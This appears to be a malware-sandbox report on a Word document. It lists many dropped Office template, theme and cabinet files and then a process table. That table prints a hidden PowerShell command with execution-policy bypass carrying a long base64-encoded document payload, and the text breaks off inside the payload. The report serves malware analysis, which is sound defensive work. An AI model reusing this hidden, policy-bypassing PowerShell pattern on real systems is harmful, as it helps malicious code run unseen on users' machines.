Microsoft Cabinet archive data, many, 624532 bytes, 2 files, at 0x44 +A "content.inf" +A "Quotable.thmx", flags 0x4, ID 13510,
number 1, extra bytes 20 in head, 30 datablocks, 0x1503 compression
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\cab1C82.tmp
|
Microsoft Cabinet archive data, many, 682092 bytes, 2 files, at 0x44 +A "Berlin.thmx" +A "content.inf", flags 0x4, ID 46672,
number 1, extra bytes 20 in head, 30 datablocks, 0x1503 compression
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\cab1E68.tmp
|
Microsoft Cabinet archive data, many, 1049713 bytes, 2 files, at 0x44 +A "content.inf" +A "Savon.thmx", flags 0x4, ID 60609,
number 1, extra bytes 20 in head, 37 datablocks, 0x1503 compression
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\cab1E69.tmp
|
Microsoft Cabinet archive data, many, 937309 bytes, 2 files, at 0x44 +A "content.inf" +A "Gallery.thmx", flags 0x4, ID 44349,
number 1, extra bytes 20 in head, 34 datablocks, 0x1503 compression
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\cab1EAA.tmp
|
Microsoft Cabinet archive data, many, 1291243 bytes, 2 files, at 0x44 +A "content.inf" +A "Droplet.thmx", flags 0x4, ID 47417,
number 1, extra bytes 20 in head, 54 datablocks, 0x1503 compression
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\cab1FC6.tmp
|
Microsoft Cabinet archive data, many, 1750009 bytes, 2 files, at 0x44 +A "content.inf" +A "Slate.thmx", flags 0x4, ID 28969,
number 1, extra bytes 20 in head, 72 datablocks, 0x1503 compression
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\cab1FD7.tmp
|
Microsoft Cabinet archive data, many, 1865728 bytes, 2 files, at 0x44 +A "content.inf" +A "Damask.thmx", flags 0x4, ID 63852,
number 1, extra bytes 20 in head, 68 datablocks, 0x1503 compression
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\cab2047.tmp
|
Microsoft Cabinet archive data, many, 1081343 bytes, 2 files, at 0x44 +A "Circuit.thmx" +A "content.inf", flags 0x4, ID 11309,
number 1, extra bytes 20 in head, 45 datablocks, 0x1503 compression
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\cab25A8.tmp
|
Microsoft Cabinet archive data, many, 2511552 bytes, 2 files, at 0x44 +A "content.inf" +A "Main_Event.thmx", flags 0x4, ID
59889, number 1, extra bytes 20 in head, 90 datablocks, 0x1503 compression
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\cab25A9.tmp
|
Microsoft Cabinet archive data, many, 2573508 bytes, 2 files, at 0x44 +A "content.inf" +A "Mesh.thmx", flags 0x4, ID 62129,
number 1, extra bytes 20 in head, 94 datablocks, 0x1503 compression
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\cab26A6.tmp
|
Microsoft Cabinet archive data, many, 3239239 bytes, 2 files, at 0x44 +A "content.inf" +A "Vapor_Trail.thmx", flags 0x4, ID
19811, number 1, extra bytes 20 in head, 111 datablocks, 0x1503 compression
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\cab26A7.tmp
|
Microsoft Cabinet archive data, many, 3400898 bytes, 2 files, at 0x4c "Insight design set.dotx", iFolder 0x1 "Content.inf",
2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 106 datablocks, 0x1203 compression
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\~$3-6341-11.docx
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Microsoft\Office\MSO3072.acl
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM03090430[[fn=Banded]].thmx
(copy)
|
Microsoft OOXML
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM03090434[[fn=Wood Type]].thmx
(copy)
|
Microsoft OOXML
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM03457444[[fn=Basis]].thmx
(copy)
|
Microsoft OOXML
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM03457464[[fn=Dividend]].thmx
(copy)
|
Microsoft OOXML
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM03457485[[fn=Mesh]].thmx (copy)
|
Microsoft OOXML
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM03457491[[fn=Metropolitan]].thmx
(copy)
|
Microsoft OOXML
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM03457496[[fn=Parallax]].thmx
(copy)
|
Zip archive data, at least v2.0 to extract, compression method=deflate
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM03457503[[fn=Quotable]].thmx
(copy)
|
Microsoft OOXML
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM03457510[[fn=Savon]].thmx
(copy)
|
Microsoft OOXML
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM03457515[[fn=View]].thmx (copy)
|
Microsoft OOXML
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM04033917[[fn=Berlin]].thmx
(copy)
|
Microsoft OOXML
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM04033919[[fn=Circuit]].thmx
(copy)
|
Zip archive data, at least v2.0 to extract, compression method=deflate
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM04033921[[fn=Damask]].thmx
(copy)
|
Microsoft OOXML
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM04033925[[fn=Droplet]].thmx
(copy)
|
Microsoft OOXML
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM04033927[[fn=Main Event]].thmx
(copy)
|
Microsoft OOXML
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM04033929[[fn=Slate]].thmx
(copy)
|
Microsoft OOXML
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM04033937[[fn=Vapor Trail]].thmx
(copy)
|
Microsoft OOXML
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM10001114[[fn=Gallery]].thmx
(copy)
|
Microsoft OOXML
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM10001115[[fn=Parcel]].thmx
(copy)
|
Microsoft OOXML
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\TM03328884[[fn=architecture]].glox
(copy)
|
Microsoft OOXML
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\TM03328893[[fn=BracketList]].glox
(copy)
|
Microsoft OOXML
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\TM03328905[[fn=Chevron Accent]].glox
(copy)
|
Microsoft OOXML
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\TM03328908[[fn=Circle Process]].glox
(copy)
|
Zip archive data, at least v2.0 to extract, compression method=deflate
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\TM03328916[[fn=Converging
Text]].glox (copy)
|
Zip archive data, at least v2.0 to extract, compression method=deflate
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\TM03328919[[fn=Hexagon Radial]].glox
(copy)
|
Microsoft OOXML
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\TM03328925[[fn=Interconnected
Block Process]].glox (copy)
|
Zip archive data, at least v2.0 to extract, compression method=deflate
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\TM03328932[[fn=Picture Frame]].glox
(copy)
|
Microsoft OOXML
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\TM03328935[[fn=Picture Organization
Chart]].glox (copy)
|
Microsoft OOXML
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\TM03328940[[fn=Radial Picture
List]].glox (copy)
|
Microsoft OOXML
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\TM03328951[[fn=Tabbed Arc]].glox
(copy)
|
Zip archive data, at least v2.0 to extract, compression method=deflate
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\TM03328972[[fn=Tab List]].glox
(copy)
|
Zip archive data, at least v2.0 to extract, compression method=deflate
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\TM03328975[[fn=Theme Picture
Accent]].glox (copy)
|
Zip archive data, at least v2.0 to extract, compression method=deflate
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\TM03328983[[fn=Theme Picture
Alternating Accent]].glox (copy)
|
Zip archive data, at least v2.0 to extract, compression method=deflate
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\TM03328986[[fn=Theme Picture
Grid]].glox (copy)
|
Zip archive data, at least v2.0 to extract, compression method=deflate
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\TM03328990[[fn=Varying Width
List]].glox (copy)
|
Microsoft OOXML
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\TM03328998[[fn=Rings]].glox
(copy)
|
Microsoft OOXML
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Bibliography Styles\TM02851216[[fn=apasixtheditionofficeonline]].xsl
(copy)
|
XML 1.0 document, ASCII text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Bibliography Styles\TM02851217[[fn=chicago]].xsl
(copy)
|
XML 1.0 document, ASCII text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Bibliography Styles\TM02851218[[fn=gb]].xsl
(copy)
|
XML 1.0 document, ASCII text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Bibliography Styles\TM02851219[[fn=gostname]].xsl
(copy)
|
XML 1.0 document, ASCII text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Bibliography Styles\TM02851220[[fn=gosttitle]].xsl
(copy)
|
XML 1.0 document, ASCII text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Bibliography Styles\TM02851221[[fn=harvardanglia2008officeonline]].xsl
(copy)
|
XML 1.0 document, Unicode text, UTF-8 text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Bibliography Styles\TM02851222[[fn=ieee2006officeonline]].xsl
(copy)
|
XML 1.0 document, Unicode text, UTF-8 text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Bibliography Styles\TM02851223[[fn=iso690]].xsl
(copy)
|
XML 1.0 document, ASCII text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Bibliography Styles\TM02851224[[fn=iso690nmerical]].xsl
(copy)
|
XML 1.0 document, ASCII text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Bibliography Styles\TM02851225[[fn=mlaseventheditionofficeonline]].xsl
(copy)
|
XML 1.0 document, ASCII text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Bibliography Styles\TM02851226[[fn=turabian]].xsl
(copy)
|
XML 1.0 document, ASCII text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Bibliography Styles\TM02851227[[fn=sist02]].xsl
(copy)
|
XML 1.0 document, ASCII text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Building Blocks\1033\TM01840907[[fn=Equations]].dotx
(copy)
|
Microsoft Word 2007+
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Building Blocks\1033\TM02835233[[fn=Text
Sidebar (Annual Report Red and Black design)]].docx (copy)
|
Microsoft Word 2007+
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Building Blocks\1033\TM03998158[[fn=Element]].dotx
(copy)
|
Microsoft Word 2007+
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Building Blocks\1033\TM03998159[[fn=Insight]].dotx
(copy)
|
Microsoft Word 2007+
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Microsoft\UProof\CUSTOM.DIC
|
Unicode text, UTF-16, little-endian text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\1I5GYJVC0R4S4YYVKGLG.temp
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\VPXV5Y9AOF6QD94HBQRH.temp
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\b465ab91816c740.customDestinations-ms (copy)
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\fb3b0dbfee58fac8.customDestinations-ms (copy)
|
data
|
dropped
|
||
|
C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
|
JSON data
|
dropped
|
There are 232 hidden files, click here to show them.
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden -nop -noni -exec bypass -c $temp='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